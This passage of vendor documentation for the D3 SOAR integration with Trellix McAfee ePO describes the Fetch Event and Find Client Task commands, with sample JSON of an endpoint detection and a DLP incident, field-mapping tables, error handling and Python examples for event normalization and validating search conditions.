| Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Determine Repository failed. |
| Status Code | The response code issued by the third-party API server or the D3 SOAR system, which can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission settings in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details. | Status Code: 401. |
| Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: Unauthorized. |

Error Sample Data

Determine Repository failed.

Status Code: 401.

Message: Unauthorized.

Fetch Event

Retrieves events from Trellix McAfee ePO based on the specified criteria.

Input

| Input Parameter | Required/Optional | Description | Example |
|---|---|---|---|
| Start Time | Optional | The start of the time range, in UTC. Events after the specified timestamp are fetched. | 2020-01-01 00:00 |
| End Time | Optional | The end of the time range, in UTC. Events before the specified timestamp are fetched. | 2020-10-01 00:00 |
| Number of Event(s) Fetched | Optional | The maximum number of the most recent events to return. | 100 |
| Search Condition | Optional | The query string defining the search condition for fetching events. For more information about the query syntax, refer to the Trellix McAfee ePO API documentation. Note: The input severity value must be an integer. The severity values are defined as follows: 0-Info, 1-Warning, 2-Minor, 3-Major, 4-Critical. | Condition for searching events: (where (eq EPOEvents.ThreatType "trojan" )) Condition for searching DLP incidents: (where (and (eq UDLP_Incidents.Severity "3") (eq UDLP_IncidentStatuses.StatusKey "NEW"))) |
| Is DLP Incident | Optional | The option to fetch DLP incidents as events. The default value is No. | Yes |

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "AutoGUID": "***-***-***-***-***",
        "TargetFileName": "C:\\Users\\Administrator\\Desktop\\atomic-red-team-master\\atomic-red-team-master\\atomics\\T1055\\bin\\T1055.exe",
        "SourceIPV4": "1.1.1.1",
        "SourceProcessName": "C:\\Windows\\explorer.exe",
        "ReceivedUTC": "2020-08-19T10:02:45-07:00",
        "DetectedUTC": "2020-08-19T09:56:35-07:00",
        "AnalyzerName": "McAfee Endpoint Security",
        "AnalyzerVersion": "10.7.0",
        "AnalyzerHostName": "D3cyber-PC5",
        "AnalyzerIPV4": "192.168.85.11",
        "AnalyzerIPV6": "0:0:0:0:0:FFFF:C0A8:550B",
        "AnalyzerMAC": "000c29cb025a",
        "AnalyzerDATVersion": "4169.0",
        "AnalyzerEngineVersion": "6100.8979",
        "AnalyzerDetectionMethod": "On-Access Scan",
        "SourceHostName": "D3cyber-PC5",
        "SourceIPV6": "0:0:0:0:0:FFFF:C0A8:550B",
        "TargetHostName": "D3cyber-PC5",
        "TargetIPV4": "192.168.85.11",
        "TargetIPV6": "0:0:0:0:0:FFFF:C0A8:550B",
        "TargetUserName": "D3CYBER-PC5\\Administrator",
        "ThreatEventID": 1027,
        "ThreatSeverity": 2,
        "ThreatName": "RDN/Generic Dropper",
        "ThreatType": "trojan",
        "ThreatActionTaken": "IDS_ALERT_ACT_TAK_DEL",
        "ThreatHandled": true,
        "IsDLPIncidents": false
    },
    {
        "IncidentId": 2,
        "ComputerID": 10003,
        "IncidentType": 10000,
        "ViolationLocalTime": "2021-04-08T11:40:08-07:00",
        "ViolationTimezone": "Pacific Daylight Time",
        "TotalMatchCount": 0,
        "TotalContentSize": 0,
        "PolicyInfoId": 2,
        "RulesToDisplay": "Plug and Play Device Rule",
        "SourceApplicationId": null,
        "Severity": 3,
        "StatusId": "2",
        "ResolutionId": "2",
        "ActualAction": 0,
        "ExpectedAction": 0,
        "FailureReason": 0,
        "JustificationText": "",
        "McAfeeAgentGuid": "6FB58B73-B510-4B5E-998A-331317FD5709",
        "EvidenceCount": 0,
        "ReportingProduct": 1,
        "destination": "portable devices",
        "ShortMatchString": "",
        "DestinationUserID": null,
        "ExternalId": null,
        "ActivityEnum": null,
        "Name": "LAPTOP-IE3MEDPQ",
        "IP": "192.168.1.215",
        "PrimaryUserAccountID": "LAPTOP-IE3MEDPQ\\admin@",
        "Username_NTLM": "LAPTOP-IE3MEDPQ\\admin",
        "FQDN": null,
        "UserName": "admin",
        "SID": null,
        "UID": null,
        "UserOU": "",
        "FirstName": null,
        "LastName": null,
        "PrimaryEmailAddress": "",
        "UserTitle": "",
        "UserBusinessUnit": null,
        "UserDepartment": "",
        "UserCity": null,
        "UserCountry": null,
        "UserCompany": null,
        "UserManagerAccountID": "",
        "DLPReviewerUserAccount": null,
        "Custom1": null,
        "Custom2": null,
        "Custom3": null,
        "UserStatus": null,
        "LastDayInOffice": null,
        "LastDayInOfficeYYYYMM": null,
        "LastUpdated": null,
        "LastUpdatedBy": null,
        "LastUpdatedMethod": null,
        "UserGroups": "Administrators",
        "StatusKey": "NEW",
        "IsDLPIncidents": true
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
  {
      "AutoGUID": "***-***-***-***-***",
      "TargetFileName": "C:\\Users\\Administrator\\Desktop\\atomic-red-team-master\\atomic-red-team-master\\atomics\\T1055\\bin\\T1055.exe",
      "SourceIPV4": "***.***.***.***",
      "SourceProcessName": "C:\\Windows\\explorer.exe",
      "ReceivedUTC": "2020-08-19T10:02:45-07:00",
      "DetectedUTC": "2020-08-19T09:56:35-07:00",
      "AnalyzerName": "McAfee Endpoint Security",
      "AnalyzerVersion": "10.7.0",
      "AnalyzerHostName": "*****-PC5",
      "AnalyzerIPV4": "***.***.***.***",
      "AnalyzerIPV6": "****:****:****:***::****",
      "AnalyzerMAC": "****",
      "AnalyzerDATVersion": "4169.0",
      "AnalyzerEngineVersion": "6100.8979",
      "AnalyzerDetectionMethod": "On-Access Scan",
      "SourceHostName": "***-PC5",
      "SourceIPV6": "****:****:****:***::****",
      "TargetHostName": "***-PC5",
      "TargetIPV4": "***.***.***.***",
      "TargetIPV6": "****:****:****:***::****",
      "TargetUserName": "***-PC5\\Administrator",
      "ThreatEventID": 1027,
      "ThreatSeverity": 2,
      "ThreatName": "RDN/Generic Dropper",
      "ThreatType": "trojan",
      "ThreatActionTaken": "IDS_ALERT_ACT_TAK_DEL",
      "ThreatHandled": true,
      "IsDLPIncidents": false
  },
  {
      "IncidentId": 2,
      "ComputerID": ***,
      "IncidentType": 10000,
      "ViolationLocalTime": "2021-04-08T11:40:08-07:00",
      "ViolationTimezone": "Pacific Daylight Time",
      "TotalMatchCount": 0,
      "TotalContentSize": 0,
      "PolicyInfoId": 2,
      "RulesToDisplay": "Plug and Play Device Rule",
      "SourceApplicationId": null,
      "Severity": 3,
      "StatusId": "2",
      "ResolutionId": "2",
      "ActualAction": 0,
      "ExpectedAction": 0,
      "FailureReason": 0,
      "JustificationText": "",
      "McAfeeAgentGuid": "***-***-***-***-***",
      "EvidenceCount": 0,
      "ReportingProduct": 1,
      "destination": "portable devices",
      "ShortMatchString": "",
      "DestinationUserID": null,
      "ExternalId": null,
      "ActivityEnum": null,
      "Name": "LAPTOP-*****",
      "IP": "***.***.***.***",
      "PrimaryUserAccountID": "LAPTOP-*****\\admin@",
      "Username_NTLM": "LAPTOP-*****\\admin",
      "FQDN": null,
      "UserName": "admin",
      "SID": null,
      "UID": null,
      "UserOU": "",
      "FirstName": null,
      "LastName": null,
      "PrimaryEmailAddress": "",
      "UserTitle": "",
      "UserBusinessUnit": null,
      "UserDepartment": "",
      "UserCity": null,
      "UserCountry": null,
      "UserCompany": null,
      "UserManagerAccountID": "",
      "DLPReviewerUserAccount": null,
      "Custom1": null,
      "Custom2": null,
      "Custom3": null,
      "UserStatus": null,
      "LastDayInOffice": null,
      "LastDayInOfficeYYYYMM": null,
      "LastUpdated": null,
      "LastUpdatedBy": null,
      "LastUpdatedMethod": null,
      "UserGroups": "Administrators",
      "StatusKey": "NEW",
      "IsDLPIncidents": true
  }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "IDs": "\"[\\r\\n \\r\\n  \\\"***-***-***-***-***\\\",\\r\\n \\r\\n  \\\"***-***-***-***-***\\\"\\r\\n \\r\\n ]\"",
    "IncidentIds": "\"[*****]\"",
    "IncidentTypeID": "\"[10000,10000,10000,10000,10000]\"",
    "ComputerNames": "\"[\\r\\n\\t\\\"user\\\"]\"",
    "ComputerIPs": "\"[\\r\\n\\t\\\"1.1.1.1\\\"]\"",
    "ViolationLocalTime": "\"[\\r\\n\\t\\\"2021-04-13 12:57:29\\\",\\r\\n\\t\\\"2021-04-13 12:57:29\\\",\\r\\n\\t\\\"2021-04-13 12:55:57\\\",\\r\\n\\t\\\"2021-04-13 12:55:57\\\",\\r\\n\\t\\\"2021-04-13 12:14:00\\\"\\r\\n]\"",
    "UserName": "\"[\\r\\n\\t\\\"user\\\",\\r\\n\\t\\\"user\\\"]\"",
    "Severity": "\"[3,3,3,3,3]\"",
    "ActualAction": "\"[0,0,0,0,0]\"",
    "ExpectedAction": "\"[0,0,0,0,0]\"",
    "StatusKey": "\"[\\\"NEW\\\",\\\"NEW\\\",\\\"NEW\\\",\\\"NEW\\\",\\\"NEW\\\"]\"",
    "ReviewerUserAccount": "\"[]\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

AUTOGUID

TARGETFILENAME

SOURCEIPV4

SOURCEPROCESSNAME

RECEIVEDUTC

DETECTEDUTC

ANALYZERNAME

ANALYZERVERSION

ANALYZERHOSTNAME

ANALYZERIPV4

ANALYZERIPV6

ANALYZERMAC

ANALYZERDATVERSION

ANALYZERENGINEVERSION

ANALYZERDETECTIONMETHOD

SOURCEHOSTNAME

SOURCEIPV6

TARGETHOSTNAME

TARGETIPV4

TARGETIPV6

TARGETUSERNAME

THREATEVENTID

THREATSEVERITY

THREATNAME

THREATTYPE

THREATACTIONTAKEN

THREATHANDLED

***-***-***-***-***

C:\Users\Administrator\Desktop\atomic-red-team-master\atomic-red-team-master\atomics\T1055\bin\T1055.exe

1.1.1.1

C:\Windows\explorer.exe

8/19/2020 10:02:45 AM

8/19/2020 9:56:35 AM

McAfee Endpoint Security

10.7.0

***-PC5

1.1.1.1

0:0:0:0:0:FFFF:C0A0:000B

0***a

4169.0

6100.8979

On-Access Scan

D***-PC5

0:0:0:0:0:FFFF:C0A0:000B

D***-PC5

1.1.1.1

0:0:0:0:0:FFFF:C0A0:000B

D***-PC5\Administrator

1***

2

RDN/Generic Dropper

trojan

IDS_***EL

True

DLP Incidents

INCIDENTID

COMPUTERID

INCIDENTTYPE

VIOLATIONLOCALTIME

VIOLATIONTIMEZONE

TOTALMATCHCOUNT

TOTALCONTENTSIZE

POLICYINFOID

RULESTODISPLAY

SEVERITY

STATUSID

RESOLUTIONID

ACTUALACTION

EXPECTEDACTION

FAILUREREASON

JUSTIFICATIONTEXT

MCAFEEAGENTGUID

EVIDENCECOUNT

REPORTINGPRODUCT

DESTINATION

SHORTMATCHSTRING

NAME

IP

PRIMARYUSERACCOUNTID

USERNAME_NTLM

USERNAME

USEROU

PRIMARYEMAILADDRESS

USERTITLE

USERDEPARTMENT

USERMANAGERACCOUNTID

USERGROUPS

STATUSKEY

LOCALTIME

***

1***

10000

4/13/2021 12:57:29 PM

Pacific Summer Time

0

0

4

Plug and Play Device Rule

3

2

1

0

0

0

1***-***-***-***-***

0

1

universal serial bus controllers

user

1.1.1.1

user@

user

user

Administrators

NEW

4/13/2021 12:57:29 PM (Pacific Summer Time)

Fetch Event Field Mapping

Fetch Event commands require event field mapping. Field mapping plays a key role in the data normalization part of the event pipeline: it converts the original data fields from different providers into the D3 fields standardized by the D3 Model. Please refer to Event and Incident Intake Field Mapping for details.

If you require a custom field mapping, click + Add Field to add one. You can also remove built-in field mappings by clicking x. Two underscore characters are automatically prefixed to the defined Field Name to form the System Name of a custom field mapping. Additionally, any spaces in an input Field Name are automatically replaced with underscores in the corresponding System Name.

The Trellix McAfee ePO integration in D3 SOAR has separate pre-configured field mappings for events and DLP incidents because the raw data returned for the two differs. These correspond to the Default Event Source and DLP Incidents mappings:

  • Default Event Source
    Configures the field mappings that are specific to events. If a source field in a field mapping is not found, that field mapping is ignored. The default event source has a “Main Event JSON Path” (i.e., $) that is used to extract a batch of events from the response raw data. Click Edit Event Source to view the “Main Event JSON Path”.

    • Main Event JSON Path: $
      The Main Event JSON Path determines the root path where the system starts parsing raw response data into D3 event data. The JSON path begins with $, representing the root element. The path is formed by appending a sequence of child elements to $, each separated by a dot (.). Square brackets with nested quotation marks ([‘...’]) should be used to separate child elements in JSON arrays.
      For example, the root node of a JSON Path is $. The child node denoting the Unique Event Key field would be AutoGUID. Putting it together, the JSON Path expression to extract the Unique Event Key is $.AutoGUID.

  • Event Source for DLP Incidents

    Configures the field mappings that are specific to DLP incidents. If a source field in a field mapping is not found, that field mapping is ignored. Because DLP incident data is characterized by the IsDLPIncident field having the value True, DLP incidents can be identified with the Search String: {$.IsDLPIncident}=True. Click Edit Event Source to view the Search String.

The pre-configured field mappings are detailed below:

Default Event Source (Main Event JSON Path: $)

| Field Name | Source Field |
|---|---|
| None | .AnalyzerDATVersion |
| None | .AnalyzerDetectionMethod |
| None | .AnalyzerEngineVersion |
| None | .AnalyzerHostName |
| None | .AnalyzerIPV4 |
| None | .AnalyzerMAC |
| None | .AnalyzerName |
| None | .AnalyzerVersion |
| Application layer protocol | .TargetProtocol |
| Call trace | .SourceDescription |
| Destination IP address | .TargetIPV4 |
| Destination port | .TargetPort |
| Destination MAC | .TargetMAC |
| Driver image path | .TargetFileName |
| Unique Event Key | .AutoGUID |
| EventTime/UtcTime | .DetectedUTC |
| Event Type | .ThreatType |
| Filename | .TargetFileName |
| ParentImage | .SourceParentProcessName |
| Parent process name | .SourceParentProcessName |
| Process command line | .SourceDescription |
| Process file path | .SourceFilePath |
| Process Hash | .SourceProcessHash |
| Process Name | .SourceProcessName |
| Receipt time | .TargetCreateTime |
| Registry path | TargetFileName |
| Source hostname | .SourceHostName |
| Source IP address | .SourceIPV4 |
| Source port | .SourcePort |
| Source MAC address | .SourceMAC |
| Source username | .SourceUserName |
| None | .TargetHostName |
| Target image | .TargetFileName |
| Target process name | .TargetProcessName |
| Threat action taken | .ThreatActionTaken |
| Threat event ID | .ThreatEventID |
| Threat handled | .ThreatHandled |
| Threat name | .ThreatName |
| Threat severity | .ThreatSeverity |
| Threat type | .ThreatType |
| URL | .TargetURL |
| Username | .TargetUserName |
| Start time (UTC) | .DetectedUTC |

Event Source for DLP Incidents (Search String: {$.IsDLPIncident}=True)

The search string format is {jsonpath}=value. If the value of the IsDLPIncident key is True in the event object under raw data, then the DLP Incidents will use the field mapping below.

| Field Name | Source Field |
|---|---|
| __ViolationLocalTime | .LocalTime |
| Device IP address | .IP |
| Unique Event Key | .IncidentId |
| Event Type | .RulesToDisplay |
| Hostname | .Name |
| Start Time | .ViolationLocalTime |
| Severity | .Severity |
| Status | .StatusKey |
| Username | .UserName |
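The routing and mapping described in this section, as an added example that is not D3's own code: each event under the Main Event JSON Path is matched to the DLP Incidents source or the Default Event Source, a subset of the pre-configured mappings is applied, and mappings whose source field is missing are ignored and reported. The events are constructed from the Fetch Event sample data; the function names, and the choice to accept both IsDLPIncident (the search string) and IsDLPIncidents (the key in the sample raw data), are assumptions.

```python
# Added illustration, not D3's implementation. Events are constructed from the
# Fetch Event sample data on this page; GUID, hosts and IPs are placeholders.
RAW_EVENTS = [
    {
        "AutoGUID": "00000000-0000-0000-0000-000000000001",
        "TargetFileName": r"C:\Users\Administrator\Desktop\T1055.exe",
        "SourceIPV4": "192.0.2.10",
        "SourceProcessName": r"C:\Windows\explorer.exe",
        "DetectedUTC": "2020-08-19T09:56:35-07:00",
        "TargetUserName": r"LAB-PC5\Administrator",
        "ThreatSeverity": 2,
        "ThreatName": "RDN/Generic Dropper",
        "ThreatType": "trojan",
        "ThreatHandled": True,
        "IsDLPIncidents": False,
    },
    {
        "IncidentId": 2,
        "RulesToDisplay": "Plug and Play Device Rule",
        "Severity": 3,
        "Name": "LAPTOP-EXAMPLE",
        "IP": "192.0.2.215",
        "UserName": "admin",
        "ViolationLocalTime": "2021-04-08T11:40:08-07:00",
        "StatusKey": "NEW",
        "IsDLPIncidents": True,
    },
]

# Subset of the pre-configured mappings (leading "." of the source field dropped).
DEFAULT_MAPPING = {
    "Unique Event Key": "AutoGUID",
    "EventTime/UtcTime": "DetectedUTC",
    "Event Type": "ThreatType",
    "Filename": "TargetFileName",
    "Process Name": "SourceProcessName",
    "Source IP address": "SourceIPV4",
    "Source port": "SourcePort",  # not present in the sample event
    "Threat name": "ThreatName",
    "Threat severity": "ThreatSeverity",
    "Threat handled": "ThreatHandled",
    "Username": "TargetUserName",
}
DLP_MAPPING = {
    "__ViolationLocalTime": "LocalTime",  # not present in the sample raw data
    "Device IP address": "IP",
    "Unique Event Key": "IncidentId",
    "Event Type": "RulesToDisplay",
    "Hostname": "Name",
    "Start Time": "ViolationLocalTime",
    "Severity": "Severity",
    "Status": "StatusKey",
    "Username": "UserName",
}


def system_name(field_name):
    """System Name of a custom field: '__' prefix, spaces become underscores."""
    return "__" + field_name.replace(" ", "_")


def is_dlp_incident(event):
    """Apply the search string {$.IsDLPIncident}=True to one event object."""
    # Assumption: both spellings are accepted, because the search string and
    # the sample raw data on this page name the key differently.
    return any(str(event.get(key)).lower() == "true"
               for key in ("IsDLPIncident", "IsDLPIncidents"))


def select_events(raw, main_path="$"):
    """Resolve a dot-separated Main Event JSON Path ('$' or '$.a.b') to a batch."""
    if not main_path.startswith("$"):
        raise ValueError("a JSON path must begin with $")
    node = raw
    for part in filter(None, main_path[1:].split(".")):
        node = node[part]
    return node if isinstance(node, list) else [node]


def normalize(event):
    """Map one raw event to D3 field names; report mappings that were ignored."""
    dlp = is_dlp_incident(event)
    mapping = DLP_MAPPING if dlp else DEFAULT_MAPPING
    fields = {name: event[src] for name, src in mapping.items() if src in event}
    skipped = [name for name, src in mapping.items() if src not in event]
    source = "DLP Incidents" if dlp else "Default Event Source"
    return {"source": source, "fields": fields, "skipped": skipped}


def normalize_batch(raw, main_path="$"):
    return [normalize(event) for event in select_events(raw, main_path)]


if __name__ == "__main__":
    for item in normalize_batch(RAW_EVENTS):
        print(item["source"], item["fields"]["Unique Event Key"], item["skipped"])
```

The skipped list is worth reviewing after an ePO or integration upgrade: a mapping that silently stops matching leaves the corresponding D3 field empty on every ingested event.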

Error Handling

If the Return Data is Failed, an Error tab will appear in the Test Result window.

The Error tab contains the details returned by D3 SOAR or third-party API calls, including the Failure Indicator, Status Code, and Message. These details can help you locate the root cause of a command failure.

| Parts in Error | Description | Example |
|---|---|---|
| Failure Indicator | Indicates the command failure that happened at a specific input and/or API call. | Fetch Event failed. |
| Status Code | The response code issued by the third-party API server or the D3 SOAR system, which can be used to locate the corresponding error category. For example, if the returned status code is 401, the selected connection is unauthorized to run the command. The user or system support would need to check the permission settings in the Trellix McAfee ePO portal. Refer to the HTTP Status Code Registry for details. | Status Code: 400. |
| Message | The raw data or captured key error message from the integration API server about the API request failure. | Message: This error might be caused by incorrect search condition. Please refer to sample data for syntax of search condition. Also, you can refer to McAfee document <https://docs.mcafee.com/bundle/epolicy-orchestrator-web-api-reference-guide/page/GUID-***-***-***-***-***.html> for detailed syntax. |

Error Sample Data

Fetch Event failed.

Status Code: 400.

Message: This error might be caused by incorrect search condition. Please refer to sample data for syntax of search condition. Also, you can refer to McAfee document <https://docs.mcafee.com/bundle/epolicy-orchestrator-web-api-reference-guide/page/GUID-***-***-***-***-***.html> for detailed syntax.
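A pre-flight check for the Search Condition input, added here as an example and not part of the D3 integration or the ePO API: it tokenizes the condition, confirms that parentheses and quotes balance and that the expression starts with where, and enforces the rule that severity values are integers from 0 to 4. The grammar handled (parentheses, double-quoted strings, bare symbols) is an assumption based on the two sample conditions in the Fetch Event input table, and the function names are hypothetical.

```python
import re

# Severity values as defined in the Search Condition note on this page.
SEVERITY_LABELS = {0: "Info", 1: "Warning", 2: "Minor", 3: "Major", 4: "Critical"}

# Assumed token grammar: "(", ")", a double-quoted string, or a bare symbol.
TOKEN_RE = re.compile(r'(\()|(\))|"([^"]*)"|([^\s()"]+)')

# The DLP sample condition from the input table, kept on several lines.
DLP_SAMPLE = '''( where
(and (eq UDLP_Incidents.Severity "3")
(eq UDLP_IncidentStatuses.StatusKey "NEW")
)
)'''


def tokenize(text):
    """Split a condition into (kind, value) tokens; ValueError on a bad quote."""
    tokens, pos = [], 0
    while True:
        while pos < len(text) and text[pos].isspace():
            pos += 1
        if pos >= len(text):
            return tokens
        match = TOKEN_RE.match(text, pos)
        if not match:
            raise ValueError(f"unterminated string or bad character at offset {pos}")
        kind = ("(", ")", "str", "sym")[match.lastindex - 1]
        tokens.append((kind, match.group(match.lastindex)))
        pos = match.end()


def parse(tokens):
    """Build nested lists from the tokens; ValueError on unbalanced parentheses."""
    def expr(i):
        if i >= len(tokens) or tokens[i][0] != "(":
            raise ValueError("expected '('")
        node, i = [], i + 1
        while i < len(tokens) and tokens[i][0] != ")":
            if tokens[i][0] == "(":
                child, i = expr(i)
                node.append(child)
            else:
                node.append(tokens[i])
                i += 1
        if i >= len(tokens):
            raise ValueError("missing ')'")
        return node, i + 1

    tree, end = expr(0)
    if end != len(tokens):
        raise ValueError("unexpected tokens after the closing ')'")
    return tree


def walk(node, problems):
    """Check every (operator column value) comparison on a Severity column."""
    args = node[1:]
    if node and isinstance(node[0], tuple) and len(args) == 2 \
            and all(isinstance(arg, tuple) for arg in args):
        column, operand = args
        # Assumption: the rule applies to columns whose last dotted part is
        # "Severity", as in the sample UDLP_Incidents.Severity.
        if column[0] == "sym" and column[1].rsplit(".", 1)[-1] == "Severity":
            if not re.fullmatch(r"[0-4]", operand[1]):
                labels = ", ".join(f"{k}-{v}" for k, v in SEVERITY_LABELS.items())
                problems.append(f"{column[1]}: severity must be an integer 0-4 "
                                f"({labels}), got {operand[1]!r}")
    for child in node:
        if isinstance(child, list):
            walk(child, problems)


def check_condition(text):
    """Return a list of problems; an empty list means the condition passed."""
    try:
        tree = parse(tokenize(text))
    except ValueError as exc:
        return [str(exc)]
    problems = []
    if tree[:1] != [("sym", "where")]:
        problems.append("condition must start with (where ...)")
    walk(tree, problems)
    return problems


if __name__ == "__main__":
    for sample in ('(where (eq EPOEvents.ThreatType "trojan" ))', DLP_SAMPLE,
                   '(where (eq UDLP_Incidents.Severity "Major"))'):
        print(check_condition(sample) or "ok")
```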

Find Client Task

Retrieves client task details based on the provided search text.

Input

| Input Parameter | Required/Optional | Description | Example |
|---|---|---|---|
| Search Text | Optional | The search text defining the condition to retrieve client task details. | Endpoint Security Threat Prevention |

Output

Raw Data

The primary response data from the API request.

SAMPLE DATA

JSON
[
    {
        "productId": "ENDP_AM_1000",
        "typeName": "Endpoint Security Threat Prevention: Policy Based On-Demand Scan",
        "objectName": "On-Demand Scan - Full Scan",
        "typeId": 13,
        "objectId": 18,
        "productName": "Endpoint Security Threat Prevention "
    },
    {
        "productId": "ENDP_AM_1000",
        "typeName": "Endpoint Security Threat Prevention: Policy Based On-Demand Scan",
        "objectName": "On-Demand Scan - Quick Scan",
        "typeId": 13,
        "objectId": 19,
        "productName": "Endpoint Security Threat Prevention "
    },
    {
        "productId": "ENDP_AM_1000",
        "typeName": "Endpoint Security Threat Prevention: Custom On-Demand Scan",
        "objectName": "New Task",
        "typeId": 11,
        "objectId": 91,
        "productName": "Endpoint Security Threat Prevention "
    },
    {
        "productId": "ENDP_AM_1000",
        "typeName": "Endpoint Security Threat Prevention: Custom On-Demand Scan",
        "objectName": "Run_ODS_CWS",
        "typeId": 11,
        "objectId": 147,
        "productName": "Endpoint Security Threat Prevention "
    }
]
Context Data

The data extracted from Raw Data converted into JSON format. Context Data may be identical to Raw Data in some cases.

It is recommended to refer to the Raw Data instead of Context Data, since it contains the complete API response data. D3 will deprecate Context Data in the future, and playbook tasks using Context Data will be replaced with Raw Data.

SAMPLE DATA

CODE
[
    {
        "productId": "ENDP_AM_1000",
        "typeName": "Endpoint Security Threat Prevention: Policy Based On-Demand Scan",
        "objectName": "On-Demand Scan - Full Scan",
        "typeId": 13,
        "objectId": 18,
        "productName": "Endpoint Security Threat Prevention "
    },
    {
        "productId": "ENDP_AM_1000",
        "typeName": "Endpoint Security Threat Prevention: Policy Based On-Demand Scan",
        "objectName": "On-Demand Scan - Quick Scan",
        "typeId": 13,
        "objectId": 19,
        "productName": "Endpoint Security Threat Prevention "
    },
    {
        "productId": "ENDP_AM_1000",
        "typeName": "Endpoint Security Threat Prevention: Custom On-Demand Scan",
        "objectName": "New Task",
        "typeId": 11,
        "objectId": 91,
        "productName": "Endpoint Security Threat Prevention "
    },
    {
        "productId": "ENDP_AM_1000",
        "typeName": "Endpoint Security Threat Prevention: Custom On-Demand Scan",
        "objectName": "Run_ODS_CWS",
        "typeId": 11,
        "objectId": 147,
        "productName": "Endpoint Security Threat Prevention "
    }
]
Key Fields

Common cyber security indicators such as unique IDs, file hash values, CVE numbers, IP addresses, etc., will be extracted from Raw Data as Key Fields.
The system stores these key fields in the path $.[playbookTask].outputData. You can use these key-value pairs as data points for playbook task inputs.

SAMPLE DATA

CODE
{
    "Output": "\"[{\\\"productId\\\":\\\"EPOAGENTMETA\\\",\\\"typeName\\\":\\\"McAfee Agent: McAfee Agent Statistics\\\",\\\"objectName\\\":\\\"Collect All\\\",\\\"typeId\\\":4,\\\"objectId\\\":7,\\\"productName\\\":\\\"McAfee Agent \\\"},{\\\"productId\\\":\\\"EPOAGENTMETA\\\",\\\"typeName\\\":\\\"McAfee Agent: Product Deployment\\\",\\\"objectName\\\":\\\"McAfee Active Response 2.4.0.158\\\",\\\"typeId\\\":2,\\\"objectId\\\":21,\\\"productName\\\":\\\"McAfee Agent \\\"},{\\\"productId\\\":\\\"EPOAGENTMETA\\\",\\\"typeName\\\":\\\"McAfee Agent: Product Deployment\\\",\\\"objectName\\\":\\\"McAfee Active Response 2.4.4.404\\\",\\\"typeId\\\":2,\\\"objectId\\\":23,\\\"productName\\\":\\\"McAfee Agent \\\"},{\\\"productId\\\":\\\"EPOAGENTMETA\\\",\\\"typeName\\\":\\\"McAfee Agent: McAfee Agent Statistics\\\",\\\"objectName\\\":\\\"On-Demand Scan - Full Scan\\\",\\\"typeId\\\":4,\\\"objectId\\\":24,\\\"productName\\\":\\\"McAfee Agent \\\"},{\\\"productId\\\":\\\"EPOAGENTMETA\\\",\\\"typeName\\\":\\\"McAfee Agent: McAfee Agent Statistics\\\",\\\"objectName\\\":\\\"On-Demand Scan - Quick Scan\\\",\\\"typeId\\\":4,\\\"objectId\\\":25,\\\"productName\\\":\\\"McAfee Agent \\\"}]\"",
    "objectId": "\"[\\r\\n \\r\\n  18,\\r\\n \\r\\n  19,\\r\\n \\r\\n  91,\\r\\n \\r\\n  147\\r\\n \\r\\n ]\"",
    "objectName": "\"[\\r\\n \\r\\n  \\\"On-Demand Scan - Full Scan\\\",\\r\\n \\r\\n  \\\"On-Demand Scan - Quick Scan\\\",\\r\\n \\r\\n  \\\"New Task\\\",\\r\\n \\r\\n  \\\"Run_ODS_CWS\\\"\\r\\n \\r\\n ]\"",
    "productId": "\"[\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\",\\r\\n \\r\\n  \\\"ENDP_AM_1000\\\"\\r\\n \\r\\n ]\"",
    "productName": "\"[\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention \\\",\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention \\\",\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention \\\",\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention \\\"\\r\\n \\r\\n ]\"",
    "typeId": "\"[\\r\\n \\r\\n  13,\\r\\n \\r\\n  13,\\r\\n \\r\\n  11,\\r\\n \\r\\n  11\\r\\n \\r\\n ]\"",
    "typeName": "\"[\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention: Policy Based On-Demand Scan\\\",\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention: Policy Based On-Demand Scan\\\",\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention: Custom On-Demand Scan\\\",\\r\\n \\r\\n  \\\"Endpoint Security Threat Prevention: Custom On-Demand Scan\\\"\\r\\n \\r\\n ]\""
}
Return Data

Indicates one of the possible command execution states: Successful or Failed.

The Failed state can be triggered by any of the following errors:

  • A connection issue with the integration

  • The API returned an error message

  • No response from the API

You can view more details about an error in the Error tab.

Return Data can be passed down directly to a subsequent command or used to create conditional tasks in playbooks.

SAMPLE DATA

CODE
Successful
Result

Provides a brief summary of outputs in an HTML formatted table.

SAMPLE DATA

| productId | typeName | objectName | typeId | objectId | productName |
|---|---|---|---|---|---|
| ENDP_AM_1000 | Endpoint Security Threat Prevention: Policy Based On-Demand Scan | On-Demand Scan - Full Scan | 13 | 18 | Endpoint Security Threat Prevention |
| ENDP_AM_1000 | Endpoint Security Threat Prevention: Policy Based On-Demand Scan | On-Demand Scan - Quick Scan | 13 | 19 | Endpoint Security Threat Prevention |
| ENDP_AM_1000 | Endpoint Security Threat Prevention: Custom On-Demand Scan | New Task | 11 | 91 | Endpoint Security Threat Prevention |
